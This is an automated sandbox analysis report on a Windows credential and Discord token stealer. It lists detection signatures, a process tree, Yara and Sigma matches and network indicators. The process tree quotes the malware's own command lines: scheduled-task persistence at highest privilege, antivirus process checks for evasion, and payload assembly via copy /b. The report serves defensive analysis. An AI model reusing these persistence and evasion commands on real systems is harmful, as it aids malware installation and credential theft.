Windows Analysis Report
00000123.exe

Overview

General Information

Sample name:00000123.exe
(renamed file extension from pif to exe)
Original sample name:00000123.pif
Analysis ID:1628000
MD5:20ab8d93805914ee4e7c7953b15928a5
SHA1:f752bf44c2e7d86f05b9e9c25e3cc96faa190a04
SHA256:e428c6fe9435b8c7aee48825abcd62916d8b4706c2877c94d01c4691387c7acf
Infos:

Detection

Discord Token Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Yara detected AntiVM3
Yara detected Discord Token Stealer
Yara detected Generic Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Drops PE files with a suspicious file extension
Drops VBS files to the startup folder
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 00000123.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\00000123.exe" MD5: 20AB8D93805914EE4E7C7953B15928A5)
    • cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 7380 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
    • update.exe (PID: 7672 cmdline: "C:\Users\user\AppData\Local\Temp\update.exe" MD5: 5A69E7FBEB1781A8AB7F77E74CABDB96)
      • cmd.exe (PID: 7724 cmdline: "C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • expand.exe (PID: 7776 cmdline: expand Expensive.pps Expensive.pps.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
        • tasklist.exe (PID: 7800 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7812 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 7860 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7868 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7904 cmdline: cmd /c md 611485 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 7920 cmdline: extrac32 /Y /E Experts.pps MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 7944 cmdline: findstr /V "Gd" Investigations MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7956 cmdline: cmd /c copy /b 611485\Heroes.com + Closely + Sad + Sandwich + Legends + Labor + Mailing + Jersey + Dies + Disabled + Technical 611485\Heroes.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7976 cmdline: cmd /c copy /b ..\Utilize.pps + ..\Expenditure.pps + ..\Hacker.pps + ..\Sexually.pps + ..\Forbes.pps + ..\Taught.pps + ..\Champion.pps + ..\Eclipse.pps + ..\Plants.pps + ..\Ed.pps + ..\Midnight.pps H MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Heroes.com (PID: 7992 cmdline: Heroes.com H MD5: 62D09F076E6E0240548C2F837536A46A)
          • cmd.exe (PID: 8032 cmdline: cmd /c schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 8080 cmdline: schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • schtasks.exe (PID: 8108 cmdline: schtasks.exe /create /tn "GuardianCryptoScan360" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • MSBuild.exe (PID: 7400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • MSBuild.exe (PID: 7800 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • choice.exe (PID: 8012 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • InstallUtil.exe (PID: 1396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WerFault.exe (PID: 7288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • cmd.exe (PID: 6084 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 3788 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • wscript.exe (PID: 8156 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 6472 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • GuardianCryptoScan360.com (PID: 5364 cmdline: "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com" "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\U" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.2569244195.0000000008160000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
37.2.MSBuild.exe.5a10000.3.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.00000123.exe.8160000.6.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.00000123.exe.8160000.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

                  System Summary

                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\00000123.exe", ParentImage: C:\Users\user\Desktop\00000123.exe, ParentProcessId: 7248, ParentProcessName: 00000123.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, ProcessId: 7320, ProcessName: cmd.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8032, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 8080, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , ProcessId: 8156, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "GuardianCryptoScan360" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "GuardianCryptoScan360" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Heroes.com H, ParentImage: C:\Users\user\AppData\Local\Temp\611485\Heroes.com, ParentProcessId: 7992, ParentProcessName: Heroes.com, ProcessCommandLine: schtasks.exe /create /tn "GuardianCryptoScan360" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 8108, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs" , ProcessId: 8156, ProcessName: wscript.exe

                  Data Obfuscation

                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\00000123.exe, ProcessId: 7248, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Process startedAuthor: Joe Security: Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7724, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 7868, ProcessName: findstr.exe
                  No Suricata rule has matched

                  AV Detection

                  Source: 00000123.exeReversingLabs: Detection: 23%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: 00000123.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000123.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbW source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016A1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 00000123.exe, 00000000.00000002.2572492480.0000000008420000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: ((.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016A1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 00000123.exe, 00000000.00000002.2572492480.0000000008420000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: n8C:\Windows\InstallUtil.pdb` source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb_NP* source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbiNF* source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbl$ source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdba source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb"x source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb- source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb% source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004062D5 FindFirstFileW,FindClose,6_2_004062D5
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_00402E18 FindFirstFileW,6_2_00402E18
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00406C9B
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0079A087
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0079A1E2
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,28_2_0078E472
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,28_2_0079A570
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0075C622 FindFirstFileExW,28_2_0075C622
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007966DC FindFirstFileW,FindNextFileW,FindClose,28_2_007966DC
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00797333 FindFirstFileW,FindClose,28_2_00797333
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,28_2_007973D4
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_0078D921
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_0078DC54
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\611485Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\611485\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.5:49974 -> 51.81.129.243:7702
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com Code function: 28_2_0079D889 InternetReadFile,SetEvent,GetLastError,SetEvent,28_2_0079D889
                  Source: global traffic DNS traffic detected: DNS query: kurNPdkiGq.kurNPdkiGq
                  Source: global traffic DNS traffic detected: DNS query: 78.210.14.0.in-addr.arpa
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: 00000123.exe, updatte.exe.0.drString found in binary or memory: http://james.newtonking.com/projects/json
                  Source: update.exe, 00000006.00000002.2309139595.0000000000408000.00000002.00000001.01000000.00000007.sdmp, update.exe, 00000006.00000000.2282768835.0000000000408000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
